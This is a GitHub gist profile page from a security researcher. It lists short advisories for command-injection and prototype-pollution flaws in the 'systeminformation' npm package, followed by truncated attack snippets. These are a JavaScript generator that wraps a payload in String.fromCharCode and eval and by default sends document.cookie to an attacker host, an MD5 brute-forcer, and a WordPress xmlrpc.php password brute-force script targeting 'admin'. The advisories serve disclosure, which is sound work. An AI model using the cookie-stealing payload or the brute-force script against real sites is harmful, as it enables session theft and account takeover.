Skip to content

Instantly share code, notes, and snippets.

View EffectRenan's full-sized avatar
🇧🇷

Renan Rocha EffectRenan

🇧🇷
View GitHub Profile
@EffectRenan
EffectRenan / README.md
Created September 19, 2022 19:25
Pibic 2021-2022

...

@EffectRenan
EffectRenan / CVE-2020-26274.md
Last active December 19, 2020 22:51
[systeminformation] - Command Injection

Vulnerability: Command Injection - CVE-2020-26274

Package name: systeminformation.

Tested package versions: 4.31.0.

Fixed package versions: >= 4.31.1.

Description: The attacker can send an OS command into quotation marks and it going to be executed.

@EffectRenan
EffectRenan / CVE-2020-7778, CVE-2020-26245.md
Last active December 16, 2020 00:20
[systeminformation] - Prototype Pollution

Vulnerability: Prototype Pollution - CVE-2020-7778, CVE-2020-26245

Package name: systeminformation.

Tested package versions: 4.30.1, 4.30.2, 4.30.4

Fixed package versions: >= 4.30.5

Description: The attacker can overwrite the properties and functions of an object. It can lead to executing OS commands.

@EffectRenan
EffectRenan / CVE-2020-7752.md
Last active November 12, 2020 02:30
systeminformation - Command Injection
function generate(host, com) {
const command = (com == undefined) ? `window.location="${host}/?Cookie="+document.cookie` : com;
let encoded = command[0].charCodeAt();
for (var i = 1; i < command.length; i++) {
encoded += ',' + command[i].charCodeAt();
}
encoded = `eval(String.fromCharCode(${encoded}))`;
console.log(encoded);
return encoded;
# -*- coding: utf-8 -*-
import multiprocessing
import hashlib
import random
import string
import sys
CHARS = string.letters + string.digits
def cmp_md5(substr, stop_event, str_len, start=0, size=20):
global CHARS
while not stop_event.is_set():
#!/bin/bash
if [[ $1 == '' || $2 == '' ]]
then
echo "Execution: ./xmlrpc-bruteforce.sh https://<URL>/xmlrpc.php <password_wordlist_path>"
exit
fi
USER="admin"